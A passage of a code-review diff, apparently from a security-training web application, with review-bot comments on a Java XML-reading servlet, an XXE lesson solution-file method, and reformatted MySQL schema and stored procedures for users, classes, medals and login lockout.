";
+ out.write(htmlOutput);
}
}
} else {
@@ -126,16 +120,15 @@ public void doPost(HttpServletRequest request, HttpServletResponse response)
}
} catch (Exception e) {
out.write(errors.getString("error.funky"));
- log.fatal(LEVEL_NAME + " - " + e);
+ log.fatal(LEVEL_NAME + " - " + e.toString());
}
log.debug("End of " + LEVEL_NAME + " Servlet");
}
- @Nullable
public static String readXml(InputStream xmlEmail) {
Document doc;
- String result;
+ String result = null;
DocumentBuilder dBuilder =
XmlDocumentBuilder.xmlDocBuilder(false, true, true, true, true, true);
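Review bot: Removing `@Nullable` from `readXml` drops the only marker that the method can return null, yet with `String result = null;` and the fall-through return in the next hunk it still returns null whenever parsing fails. Keep the annotation, or document the contract with a Javadoc line such as `/** Returns the HTML-encoded root text, or null if the XML cannot be parsed. */`. Separately, in the `doPost` catch block `e.toString()` is what string concatenation already produced, so the stack trace is still not logged; assuming the logger accepts a throwable argument, `log.fatal(LEVEL_NAME + " - " + e, e);` would keep it. Both `doPost` and `readXml` extend beyond this hunk.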
@@ -145,11 +138,14 @@ public static String readXml(InputStream xmlEmail) {
doc = dBuilder.parse(is);
Element root = doc.getDocumentElement();
result = root.getTextContent();
- return Encode.forHtml(result);
- } catch (SAXException | IOException e) {
+ return Encode.forHtml(result.toString());
+ } catch (SAXException e) {
+ log.error(e.toString());
+ } catch (IOException e) {
log.error(e.toString());
}
- return null;
+
+ return result;
}
/** Creates the file with the solution key needed to pass the level */
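Review bot: The new fall-through `return result;` puts the un-encoded variable on a return path of `readXml`. Today it can only be null there, because nothing after `result = root.getTextContent();` throws a caught exception, but any statement later added inside the try would let raw XML text bypass `Encode.forHtml`. Keep the explicit `return null;` after the catch blocks. The two catch blocks have identical bodies, so the original `catch (SAXException | IOException e)` was the tighter form, and `result.toString()` on a `String` is a no-op that can be dropped. The start of the method is outside this hunk.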
@@ -177,6 +173,10 @@ public static boolean createXxeLessonSolutionFile() {
FileUtils.write(lessonFile, solution, "UTF-8");
log.info("XXE Lesson Solution File " + filename + " created");
return true;
+ } catch (FileNotFoundException e) {
+ log.error(e);
+ throw new RuntimeException(e);
+
} catch (IOException e) {
log.error(e);
throw new RuntimeException(e);
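Review bot: The added `catch (FileNotFoundException e)` block is redundant: `FileNotFoundException` is a subclass of `IOException`, and its body is the same `log.error(e); throw new RuntimeException(e);` as the handler directly below it. It can be removed without changing behaviour. If the missing-path case is meant to be distinguished, give it its own message, for example `log.error("XXE lesson solution file could not be created: " + filename, e);`. The method body begins outside this hunk.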
diff --git a/src/main/resources/database/coreSchema.sql b/src/main/resources/database/coreSchema.sql
index edd103df6..12b74f0c1 100644
--- a/src/main/resources/database/coreSchema.sql
+++ b/src/main/resources/database/coreSchema.sql
@@ -1,190 +1,174 @@
-- DELIMITER ;
-SET @OLD_UNIQUE_CHECKS = @@UNIQUE_CHECKS, UNIQUE_CHECKS = 0;
-SET @OLD_FOREIGN_KEY_CHECKS = @@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS = 0;
-SET @OLD_SQL_MODE = @@SQL_MODE, SQL_MODE = 'TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
SET NAMES utf8mb4 COLLATE utf8mb4_unicode_ci;
-DROP SCHEMA IF EXISTS `core`;
-CREATE SCHEMA IF NOT EXISTS `core` DEFAULT CHARACTER SET utf8mb4;
-USE `core`;
+DROP SCHEMA IF EXISTS `core` ;
+CREATE SCHEMA IF NOT EXISTS `core` DEFAULT CHARACTER SET utf8mb4 ;
+USE `core` ;
SELECT "Creating Tables" FROM DUAL;
-- -----------------------------------------------------
-- Table `core`.`class`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `core`.`class`
-(
- `classId` VARCHAR(64) NOT NULL,
- `className` VARCHAR(32) NOT NULL UNIQUE,
- `classYear` VARCHAR(5) NOT NULL,
- PRIMARY KEY (`classId`)
-)
- ENGINE = InnoDB
- DEFAULT CHARACTER SET = utf8mb4;
+CREATE TABLE IF NOT EXISTS `core`.`class` (
+ `classId` VARCHAR(64) NOT NULL ,
+ `className` VARCHAR(32) NOT NULL UNIQUE,
+ `classYear` VARCHAR(5) NOT NULL ,
+ PRIMARY KEY (`classId`) )
+ENGINE = InnoDB
+DEFAULT CHARACTER SET = utf8mb4;
-- -----------------------------------------------------
-- Table `core`.`users`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `core`.`users`
-(
- `userId` VARCHAR(64) NOT NULL,
- `classId` VARCHAR(64) NULL,
- `userName` VARCHAR(32) NOT NULL,
- `userPass` VARCHAR(191) NOT NULL,
- `userRole` VARCHAR(32) NOT NULL,
- `ssoName` VARCHAR(191),
- `badLoginCount` INT NOT NULL DEFAULT 0,
- `suspendedUntil` DATETIME NOT NULL DEFAULT '1000-01-01 00:00:00',
- `userAddress` VARCHAR(128) NULL,
- `loginType` VARCHAR(32) NULL,
- `tempPassword` TINYINT(1) NULL DEFAULT FALSE,
- `tempUsername` TINYINT(1) NULL DEFAULT FALSE,
- `userScore` INT NOT NULL DEFAULT 0,
- `goldMedalCount` INT NOT NULL DEFAULT 0,
- `silverMedalCount` INT NOT NULL DEFAULT 0,
- `bronzeMedalCount` INT NOT NULL DEFAULT 0,
- `badSubmissionCount` INT NOT NULL DEFAULT 0,
- PRIMARY KEY (`userId`),
- INDEX `classId` (`classId` ASC),
- UNIQUE INDEX `userName_UNIQUE` (`userName` ASC),
- UNIQUE INDEX `ssoName_UNIQUE` (`ssoName` ASC),
- CONSTRAINT `classId`
- FOREIGN KEY (`classId`)
- REFERENCES `core`.`class` (`classId`)
- ON DELETE CASCADE
- ON UPDATE CASCADE
-)
- ENGINE = InnoDB
- DEFAULT CHARACTER SET = utf8mb4;
+CREATE TABLE IF NOT EXISTS `core`.`users` (
+ `userId` VARCHAR(64) NOT NULL ,
+ `classId` VARCHAR(64) NULL ,
+ `userName` VARCHAR(32) NOT NULL ,
+ `userPass` VARCHAR(191) NOT NULL ,
+ `userRole` VARCHAR(32) NOT NULL ,
+ `ssoName` VARCHAR(191) ,
+ `badLoginCount` INT NOT NULL DEFAULT 0 ,
+ `suspendedUntil` DATETIME NOT NULL DEFAULT '1000-01-01 00:00:00' ,
+ `userAddress` VARCHAR(128) NULL ,
+ `loginType` VARCHAR(32) NULL ,
+ `tempPassword` TINYINT(1) NULL DEFAULT FALSE ,
+ `tempUsername` TINYINT(1) NULL DEFAULT FALSE ,
+ `userScore` INT NOT NULL DEFAULT 0 ,
+ `goldMedalCount` INT NOT NULL DEFAULT 0 ,
+ `silverMedalCount` INT NOT NULL DEFAULT 0 ,
+ `bronzeMedalCount` INT NOT NULL DEFAULT 0 ,
+ `badSubmissionCount` INT NOT NULL DEFAULT 0,
+ PRIMARY KEY (`userId`) ,
+ INDEX `classId` (`classId` ASC) ,
+ UNIQUE INDEX `userName_UNIQUE` (`userName` ASC) ,
+ UNIQUE INDEX `ssoName_UNIQUE` (`ssoName` ASC) ,
+ CONSTRAINT `classId`
+ FOREIGN KEY (`classId` )
+ REFERENCES `core`.`class` (`classId` )
+ ON DELETE CASCADE
+ ON UPDATE CASCADE)
+ENGINE = InnoDB
+DEFAULT CHARACTER SET = utf8mb4;
-- -----------------------------------------------------
-- Table `core`.`modules`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `core`.`modules`
-(
- `moduleId` VARCHAR(64) NOT NULL,
- `moduleName` VARCHAR(64) NOT NULL,
- `moduleNameLangPointer` VARCHAR(64) NOT NULL UNIQUE,
- `moduleType` VARCHAR(16) NOT NULL,
- `moduleCategory` VARCHAR(64) NULL,
- `moduleCategoryLangPointer` VARCHAR(64) NULL,
- `moduleResult` VARCHAR(191) NULL,
- `moduleHash` VARCHAR(191) NULL UNIQUE,
- `moduleStatus` VARCHAR(16) NULL DEFAULT 'open',
- `incrementalRank` INT NULL DEFAULT 200,
- `scoreValue` INT NOT NULL DEFAULT 50,
- `hardcodedKey` TINYINT(1) NOT NULL DEFAULT TRUE,
- `isUnsafe` TINYINT(1) NOT NULL DEFAULT TRUE,
- PRIMARY KEY (`moduleId`)
-)
- ENGINE = InnoDB
- DEFAULT CHARACTER SET = utf8mb4;
+CREATE TABLE IF NOT EXISTS `core`.`modules` (
+ `moduleId` VARCHAR(64) NOT NULL ,
+ `moduleName` VARCHAR(64) NOT NULL ,
+ `moduleNameLangPointer` VARCHAR(64) NOT NULL UNIQUE,
+ `moduleType` VARCHAR(16) NOT NULL ,
+ `moduleCategory` VARCHAR(64) NULL ,
+ `moduleCategoryLangPointer` VARCHAR(64) NULL ,
+ `moduleResult` VARCHAR(191) NULL ,
+ `moduleHash` VARCHAR(191) NULL UNIQUE,
+ `moduleStatus` VARCHAR(16) NULL DEFAULT 'open' ,
+ `incrementalRank` INT NULL DEFAULT 200,
+ `scoreValue` INT NOT NULL DEFAULT 50 ,
+ `hardcodedKey` TINYINT(1) NOT NULL DEFAULT TRUE,
+ `isUnsafe` TINYINT(1) NOT NULL DEFAULT TRUE,
+ PRIMARY KEY (`moduleId`) )
+ENGINE = InnoDB
+DEFAULT CHARACTER SET = utf8mb4;
-- -----------------------------------------------------
-- Table `core`.`medals`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `core`.`medals`
-(
- `medalId` INT NOT NULL AUTO_INCREMENT,
- `classId` VARCHAR(64) NULL,
- `moduleId` VARCHAR(64) NOT NULL,
- `scoreBonus` INT NOT NULL DEFAULT 5,
- `goldMedalAvailable` TINYINT(1) NOT NULL DEFAULT TRUE,
- `silverMedalAvailable` TINYINT(1) NOT NULL DEFAULT TRUE,
- `bronzeMedalAvailable` TINYINT(1) NOT NULL DEFAULT TRUE,
- PRIMARY KEY (`medalId`),
- INDEX `fk_Medals_Modules1` (`moduleId` ASC),
- CONSTRAINT `fk_Medals_Class1`
- FOREIGN KEY (`classId`)
- REFERENCES `core`.`class` (`classId`)
- ON DELETE NO ACTION
- ON UPDATE NO ACTION,
- CONSTRAINT `fk_Medals_Modules1`
- FOREIGN KEY (`moduleId`)
- REFERENCES `core`.`modules` (`moduleId`)
- ON DELETE CASCADE
- ON UPDATE CASCADE
-)
- ENGINE = InnoDB
- DEFAULT CHARACTER SET = utf8mb4;
+CREATE TABLE IF NOT EXISTS `core`.`medals` (
+ `medalId` INT NOT NULL AUTO_INCREMENT,
+ `classId` VARCHAR(64) NULL,
+ `moduleId` VARCHAR(64) NOT NULL,
+ `scoreBonus` INT NOT NULL DEFAULT 5 ,
+ `goldMedalAvailable` TINYINT(1) NOT NULL DEFAULT TRUE,
+ `silverMedalAvailable` TINYINT(1) NOT NULL DEFAULT TRUE,
+ `bronzeMedalAvailable` TINYINT(1) NOT NULL DEFAULT TRUE,
+ PRIMARY KEY (`medalId`) ,
+ INDEX `fk_Medals_Modules1` (`moduleId` ASC) ,
+ CONSTRAINT `fk_Medals_Class1`
+ FOREIGN KEY (`classId` )
+ REFERENCES `core`.`class` (`classId` )
+ ON DELETE NO ACTION
+ ON UPDATE NO ACTION,
+ CONSTRAINT `fk_Medals_Modules1`
+ FOREIGN KEY (`moduleId` )
+ REFERENCES `core`.`modules` (`moduleId` )
+ ON DELETE CASCADE
+ ON UPDATE CASCADE)
+ENGINE = InnoDB
+DEFAULT CHARACTER SET = utf8mb4;
-- -----------------------------------------------------
-- Table `core`.`results`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `core`.`results`
-(
- `userId` VARCHAR(64) NOT NULL,
- `moduleId` VARCHAR(64) NOT NULL,
- `startTime` DATETIME NOT NULL,
- `finishTime` DATETIME NULL,
- `csrfCount` INT NULL DEFAULT 0,
- `resultSubmission` LONGTEXT NULL,
- `knowledgeBefore` INT NULL,
- `knowledgeAfter` INT NULL,
- `difficulty` INT NULL,
- `scored` INT NULL,
- `medalEarned` VARCHAR(32),
- PRIMARY KEY (`userId`, `moduleId`),
- INDEX `fk_Results_Modules1` (`moduleId` ASC),
- CONSTRAINT `fk_Results_users1`
- FOREIGN KEY (`userId`)
- REFERENCES `core`.`users` (`userId`)
- ON DELETE NO ACTION
- ON UPDATE NO ACTION,
- CONSTRAINT `fk_Results_Modules1`
- FOREIGN KEY (`moduleId`)
- REFERENCES `core`.`modules` (`moduleId`)
- ON DELETE CASCADE
- ON UPDATE CASCADE
-)
- ENGINE = InnoDB
- DEFAULT CHARACTER SET = utf8mb4;
+CREATE TABLE IF NOT EXISTS `core`.`results` (
+ `userId` VARCHAR(64) NOT NULL ,
+ `moduleId` VARCHAR(64) NOT NULL ,
+ `startTime` DATETIME NOT NULL ,
+ `finishTime` DATETIME NULL ,
+ `csrfCount` INT NULL DEFAULT 0 ,
+ `resultSubmission` LONGTEXT NULL ,
+ `knowledgeBefore` INT NULL ,
+ `knowledgeAfter` INT NULL ,
+ `difficulty` INT NULL ,
+ `scored` INT NULL,
+ `medalEarned` VARCHAR(32),
+ PRIMARY KEY (`userId`, `moduleId`) ,
+ INDEX `fk_Results_Modules1` (`moduleId` ASC) ,
+ CONSTRAINT `fk_Results_users1`
+ FOREIGN KEY (`userId` )
+ REFERENCES `core`.`users` (`userId` )
+ ON DELETE NO ACTION
+ ON UPDATE NO ACTION,
+ CONSTRAINT `fk_Results_Modules1`
+ FOREIGN KEY (`moduleId` )
+ REFERENCES `core`.`modules` (`moduleId` )
+ ON DELETE CASCADE
+ ON UPDATE CASCADE)
+ENGINE = InnoDB
+DEFAULT CHARACTER SET = utf8mb4;
-- -----------------------------------------------------
-- Table `core`.`cheatsheet`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `core`.`cheatsheet`
-(
- `cheatSheetId` VARCHAR(64) NOT NULL,
- `moduleId` VARCHAR(64) NOT NULL,
- `createDate` DATETIME NOT NULL,
- `solution` LONGTEXT NOT NULL,
- PRIMARY KEY (`cheatSheetId`, `moduleId`),
- INDEX `fk_CheatSheet_Modules1` (`moduleId` ASC),
- CONSTRAINT `fk_CheatSheet_Modules1`
- FOREIGN KEY (`moduleId`)
- REFERENCES `core`.`modules` (`moduleId`)
- ON DELETE CASCADE
- ON UPDATE CASCADE
-)
- ENGINE = InnoDB
- DEFAULT CHARACTER SET = utf8mb4;
+CREATE TABLE IF NOT EXISTS `core`.`cheatsheet` (
+ `cheatSheetId` VARCHAR(64) NOT NULL ,
+ `moduleId` VARCHAR(64) NOT NULL ,
+ `createDate` DATETIME NOT NULL ,
+ `solution` LONGTEXT NOT NULL ,
+ PRIMARY KEY (`cheatSheetId`, `moduleId`) ,
+ INDEX `fk_CheatSheet_Modules1` (`moduleId` ASC) ,
+ CONSTRAINT `fk_CheatSheet_Modules1`
+ FOREIGN KEY (`moduleId` )
+ REFERENCES `core`.`modules` (`moduleId` )
+ ON DELETE CASCADE
+ ON UPDATE CASCADE)
+ENGINE = InnoDB
+DEFAULT CHARACTER SET = utf8mb4;
-- -----------------------------------------------------
-- Table `core`.`sequence`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `core`.`sequence`
-(
- `tableName` VARCHAR(32) NOT NULL,
- `currVal` BIGINT(20) NOT NULL DEFAULT 282475249,
- PRIMARY KEY (`tableName`)
-)
- ENGINE = InnoDB
- DEFAULT CHARACTER SET = utf8mb4;
+CREATE TABLE IF NOT EXISTS `core`.`sequence` (
+ `tableName` VARCHAR(32) NOT NULL ,
+ `currVal` BIGINT(20) NOT NULL DEFAULT 282475249 ,
+ PRIMARY KEY (`tableName`) )
+ENGINE = InnoDB
+DEFAULT CHARACTER SET = utf8mb4;
-- -----------------------------------------------------
-- Table `core`.`settings`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `core`.`settings`
-(
- `setting` VARCHAR(64) NOT NULL,
- `value` VARCHAR(64) NOT NULL,
- PRIMARY KEY (`setting`)
-)
- ENGINE = InnoDB
- DEFAULT CHARACTER SET = utf8mb4;
+CREATE TABLE IF NOT EXISTS `core`.`settings` (
+ `setting` VARCHAR(64) NOT NULL ,
+ `value` VARCHAR(64) NOT NULL ,
+ PRIMARY KEY (`setting`) )
+ENGINE = InnoDB
+DEFAULT CHARACTER SET = utf8mb4;
SELECT "Creating Procedures" FROM DUAL;
@@ -194,60 +178,57 @@ SELECT "Creating Procedures" FROM DUAL;
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`userLock`(theName VARCHAR(32))
+CREATE PROCEDURE `core`.`userLock` (theName VARCHAR(32))
BEGIN
- DECLARE theDate DATETIME;
- DECLARE untilDate DATETIME;
- DECLARE theCount INT;
+DECLARE theDate DATETIME;
+DECLARE untilDate DATETIME;
+DECLARE theCount INT;
- COMMIT;
- SELECT NOW() FROM DUAL INTO theDate;
+COMMIT;
+SELECT NOW() FROM DUAL INTO theDate;
-- Get the badLoginCount from users if they are not suspended already or account has attempted a login within the last 10 mins
- SELECT badLoginCount
- FROM `users`
+SELECT badLoginCount FROM `users`
WHERE userName = theName
- AND suspendedUntil < (theDate - '0000-00-00 00:10:00')
+ AND suspendedUntil < (theDate - '0000-00-00 00:10:00')
INTO theCount;
- SELECT suspendedUntil
- FROM `users`
+SELECT suspendedUntil FROM `users`
WHERE userName = theName
- AND suspendedUntil < (theDate - '0000-00-00 00:10:00')
+ AND suspendedUntil < (theDate - '0000-00-00 00:10:00')
INTO untilDate;
- IF (untilDate < theDate) THEN
- IF (theCount >= 3) THEN
- -- Set suspended until 30 mins from now
- UPDATE `users`
- SET suspendedUntil = TIMESTAMPADD(MINUTE, 30, theDate),
- badLoginCount = 0
+IF (untilDate < theDate) THEN
+ IF (theCount >= 3) THEN
+ -- Set suspended until 30 mins from now
+ UPDATE `users` SET
+ suspendedUntil = TIMESTAMPADD(MINUTE, 30, theDate),
+ badLoginCount = 0
WHERE userName = theName;
- COMMIT;
- -- ELSE the user is already suspended, or theCount < 3
- ELSE
- -- Get user where their last bad login was within 10 mins ago
- SELECT COUNT(userId)
- FROM users
+ COMMIT;
+ -- ELSE the user is already suspended, or theCount < 3
+ ELSE
+ -- Get user where their last bad login was within 10 mins ago
+ SELECT COUNT(userId) FROM users
WHERE userName = theName
- AND suspendedUntil < (theDate - '0000-00-00 00:10:00')
+ AND suspendedUntil < (theDate - '0000-00-00 00:10:00')
INTO theCount;
- -- IF a user was counted then they are not suspended, but have attemped a bad login within 10 mins of their last
- IF (theCount > 0) THEN
- UPDATE `users`
- SET badLoginCount = (badLoginCount + 1),
- suspendedUntil = theDate
+ -- IF a user was counted then they are not suspended, but have attemped a bad login within 10 mins of their last
+ IF (theCount > 0) THEN
+ UPDATE `users` SET
+ badLoginCount = (badLoginCount + 1),
+ suspendedUntil = theDate
WHERE userName = theName;
- COMMIT;
- -- ELSE this is the first time within 10 mins that this account has logged in bad
- ELSE
- UPDATE `users`
- SET badLoginCount = 1,
- suspendedUntil = theDate
+ COMMIT;
+ -- ELSE this is the first time within 10 mins that this account has logged in bad
+ ELSE
+ UPDATE `users` SET
+ badLoginCount = 1,
+ suspendedUntil = theDate
WHERE userName = theName;
- COMMIT;
- END IF;
+ COMMIT;
END IF;
END IF;
+END IF;
END
-- $$
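Review bot: The ten-minute window in `userLock` is written as `theDate - '0000-00-00 00:10:00'`. As far as I can tell MySQL evaluates that numerically, with the string converting to 0, so the comparison reduces to `suspendedUntil < theDate` and the window described in the comments is not applied. Since these lines are being touched anyway, consider `suspendedUntil < (theDate - INTERVAL 10 MINUTE)` in all three places. Confirm with a repeated-failed-login test that the lockout counter behaves as the comments describe. The re-indent itself does not change behaviour.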
@@ -260,15 +241,15 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`suspendUser`(theId VARCHAR(64), theMins INT)
+CREATE PROCEDURE `core`.`suspendUser` (theId VARCHAR(64), theMins INT)
BEGIN
- DECLARE theDate DATETIME;
- COMMIT;
- SELECT NOW() FROM DUAL INTO theDate;
- UPDATE `users`
- SET suspendedUntil = TIMESTAMPADD(MINUTE, theMins, theDate)
+DECLARE theDate DATETIME;
+COMMIT;
+SELECT NOW() FROM DUAL INTO theDate;
+UPDATE `users` SET
+ suspendedUntil = TIMESTAMPADD(MINUTE, theMins, theDate)
WHERE userId = theId;
- COMMIT;
+COMMIT;
END
-- $$
@@ -281,15 +262,15 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`unSuspendUser`(theId VARCHAR(64))
+CREATE PROCEDURE `core`.`unSuspendUser` (theId VARCHAR(64))
BEGIN
- DECLARE theDate DATETIME;
- COMMIT;
- SELECT NOW() FROM DUAL INTO theDate;
- UPDATE `users`
- SET suspendedUntil = theDate
+DECLARE theDate DATETIME;
+COMMIT;
+SELECT NOW() FROM DUAL INTO theDate;
+UPDATE `users` SET
+ suspendedUntil = theDate
WHERE userId = theId;
- COMMIT;
+COMMIT;
END
-- $$
@@ -302,11 +283,10 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`userFind`(IN theName VARCHAR(32))
+CREATE PROCEDURE `core`.`userFind` (IN theName VARCHAR(32))
BEGIN
- COMMIT;
- SELECT userName, suspendedUntil
- FROM `users`
+COMMIT;
+SELECT userName, suspendedUntil FROM `users`
WHERE userName = theName;
END
@@ -319,12 +299,11 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`playerCount`()
+CREATE PROCEDURE `core`.`playerCount` ()
BEGIN
COMMIT;
- SELECT count(userId)
- FROM users
- WHERE userRole = 'player';
+ SELECT count(userId) FROM users
+ WHERE userRole = 'player';
END
@@ -337,10 +316,7 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`userCreate`(IN theClassId VARCHAR(64), IN theUserName VARCHAR(32), IN theUserPass VARCHAR(191),
- IN theUserRole VARCHAR(32), IN theSSOName VARCHAR(32),
- IN theUserAddress VARCHAR(128), IN theLoginType VARCHAR(32),
- theTempPassword BOOLEAN, theTempUsername BOOLEAN)
+CREATE PROCEDURE `core`.`userCreate` (IN theClassId VARCHAR(64), IN theUserName VARCHAR(32), IN theUserPass VARCHAR(191), IN theUserRole VARCHAR(32), IN theSSOName VARCHAR(32), IN theUserAddress VARCHAR(128), IN theLoginType VARCHAR(32), theTempPassword BOOLEAN, theTempUsername BOOLEAN)
BEGIN
DECLARE theId VARCHAR(64);
DECLARE theClassCount INT;
@@ -351,37 +327,37 @@ BEGIN
-- If (Valid User Type) AND (classId = null or (Valid Class Id)) Then create user
IF (theUserRole = 'player' OR theUserRole = 'admin') THEN
IF (theClassId != null) THEN
- SELECT count(classId)
- FROM class
- WHERE classId = theClassId
- INTO theClassCount;
+ SELECT count(classId) FROM class
+ WHERE classId = theClassId
+ INTO theClassCount;
IF (theClassCount != 1) THEN
SELECT null FROM DUAL INTO theClassId;
END IF;
END IF;
-- Increment sequence for users table
- UPDATE sequence
- SET currVal = currVal + 1
- WHERE tableName = 'users';
+ UPDATE sequence SET
+ currVal = currVal + 1
+ WHERE tableName = 'users';
COMMIT;
- SELECT SHA(CONCAT(currVal, tableName, theDate))
- FROM sequence
- WHERE tableName = 'users'
- INTO theId;
+ SELECT SHA(CONCAT(currVal, tableName, theDate)) FROM sequence
+ WHERE tableName = 'users'
+ INTO theId;
-- Insert the values, badLoginCount and suspendedUntil Values will use the defaults defined by the table
- INSERT INTO users (userId,
- classId,
- userName,
- userPass,
- userRole,
- ssoName,
- userAddress,
- loginType,
- tempPassword,
- tempUsername)
- VALUES (theId,
+ INSERT INTO users (
+ userId,
+ classId,
+ userName,
+ userPass,
+ userRole,
+ ssoName,
+ userAddress,
+ loginType,
+ tempPassword,
+ tempUsername
+ ) VALUES (
+ theId,
theClassId,
theUserName,
theUserPass,
@@ -390,7 +366,8 @@ BEGIN
theUserAddress,
theLoginType,
theTempPassword,
- theTempUsername);
+ theTempUsername
+ );
COMMIT;
SELECT null FROM DUAL;
ELSE
@@ -407,12 +384,12 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`userBadLoginReset`(IN theUserId VARCHAR(45))
+CREATE PROCEDURE `core`.`userBadLoginReset` (IN theUserId VARCHAR(45))
BEGIN
COMMIT;
- UPDATE users
- SET badLoginCount = 0
- WHERE userId = theUserId;
+ UPDATE users SET
+ badLoginCount = 0
+ WHERE userId = theUserId;
COMMIT;
END
@@ -425,17 +402,17 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`userPasswordChange`(IN theUserName VARCHAR(32), IN newHash VARCHAR(191))
+CREATE PROCEDURE `core`.`userPasswordChange` (IN theUserName VARCHAR(32), IN newHash VARCHAR(191))
BEGIN
- DECLARE theDate DATETIME;
- COMMIT;
- SELECT NOW() FROM DUAL INTO theDate;
- UPDATE users
- SET userPass = newHash,
- tempPassword = FALSE
+DECLARE theDate DATETIME;
+COMMIT;
+SELECT NOW() FROM DUAL INTO theDate;
+UPDATE users SET
+ userPass = newHash,
+ tempPassword = FALSE
WHERE userName = theUserName
- AND suspendedUntil < theDate;
- COMMIT;
+ AND suspendedUntil < theDate;
+COMMIT;
END
-- $$
@@ -447,16 +424,16 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`userPasswordChangeAdmin`(IN theUserId VARCHAR(64), IN newHash VARCHAR(191))
+CREATE PROCEDURE `core`.`userPasswordChangeAdmin` (IN theUserId VARCHAR(64), IN newHash VARCHAR(191))
BEGIN
- DECLARE theDate DATETIME;
- COMMIT;
- SELECT NOW() FROM DUAL INTO theDate;
- UPDATE users
- SET userPass = newHash,
- tempPassword = TRUE
+DECLARE theDate DATETIME;
+COMMIT;
+SELECT NOW() FROM DUAL INTO theDate;
+UPDATE users SET
+ userPass = newHash,
+ tempPassword = TRUE
WHERE userId = theUserId;
- COMMIT;
+COMMIT;
END
-- $$
@@ -468,18 +445,17 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`classCreate`(IN theClassName VARCHAR(32), IN theClassYear VARCHAR(5))
+CREATE PROCEDURE `core`.`classCreate` (IN theClassName VARCHAR(32), IN theClassYear VARCHAR(5))
BEGIN
DECLARE theId VARCHAR(64);
COMMIT;
- UPDATE sequence
- SET currVal = currVal + 1
- WHERE tableName = 'users';
+ UPDATE sequence SET
+ currVal = currVal + 1
+ WHERE tableName = 'users';
COMMIT;
- SELECT SHA(CONCAT(currVal, tableName))
- FROM sequence
- WHERE tableName = 'users'
- INTO theId;
+ SELECT SHA(CONCAT(currVal, tableName)) FROM sequence
+ WHERE tableName = 'users'
+ INTO theId;
INSERT INTO class VALUES (theId, theClassName, theClassYear);
END
@@ -492,7 +468,7 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`classCount`()
+CREATE PROCEDURE `core`.`classCount` ()
BEGIN
SELECT count(ClassId) FROM class;
END
@@ -506,7 +482,7 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`classesGetData`()
+CREATE PROCEDURE `core`.`classesGetData` ()
BEGIN
SELECT classId, className, classYear FROM class;
END
@@ -520,11 +496,10 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`classFind`(IN theClassId VARCHAR(64))
+CREATE PROCEDURE `core`.`classFind` (IN theClassId VARCHAR(64))
BEGIN
- SELECT className, classYear
- FROM class
- WHERE classId = theClassId;
+ SELECT className, classYear FROM class
+ WHERE classId = theClassId;
END
-- $$
@@ -536,14 +511,13 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`playersByClass`(IN theClassId VARCHAR(64))
+CREATE PROCEDURE `core`.`playersByClass` (IN theClassId VARCHAR(64))
BEGIN
COMMIT;
- SELECT userId, userName, userAddress
- FROM users
- WHERE classId = theClassId
- AND userRole = 'player'
- ORDER BY userName;
+ SELECT userId, userName, userAddress FROM users
+ WHERE classId = theClassId
+ AND userRole = 'player'
+ ORDER BY userName;
END
-- $$
@@ -555,19 +529,18 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`playerUpdateClass`(IN theUserId VARCHAR(64), IN theClassId VARCHAR(64))
+CREATE PROCEDURE `core`.`playerUpdateClass` (IN theUserId VARCHAR(64), IN theClassId VARCHAR(64))
BEGIN
- COMMIT;
- UPDATE users
- SET classId = theClassId
+COMMIT;
+UPDATE users SET
+ classId = theClassId
WHERE userId = theUserId
- AND userRole = 'player';
- COMMIT;
- SELECT userName
- FROM users
+ AND userRole = 'player';
+COMMIT;
+SELECT userName FROM users
WHERE userId = theUserId
- AND classId = theClassId
- AND userRole = 'player';
+ AND classId = theClassId
+ AND userRole = 'player';
END
-- $$
@@ -579,13 +552,12 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`playerFindById`(IN playerId VARCHAR(64))
+CREATE PROCEDURE `core`.`playerFindById` (IN playerId VARCHAR(64))
BEGIN
- COMMIT;
- SELECT userName
- FROM users
+COMMIT;
+SELECT userName FROM users
WHERE userId = playerId
- AND userRole = 'player';
+ AND userRole = 'player';
END
-- $$
@@ -597,14 +569,13 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`playersWithoutClass`()
+CREATE PROCEDURE `core`.`playersWithoutClass` ()
BEGIN
COMMIT;
- SELECT userId, userName, userAddress
- FROM users
- WHERE classId is NULL
- AND userRole = 'player'
- ORDER BY userName;
+ SELECT userId, userName, userAddress FROM users
+ WHERE classId is NULL
+ AND userRole = 'player'
+ ORDER BY userName;
END
-- $$
@@ -616,19 +587,18 @@ END
USE `core`;
-- DELIMITER $$
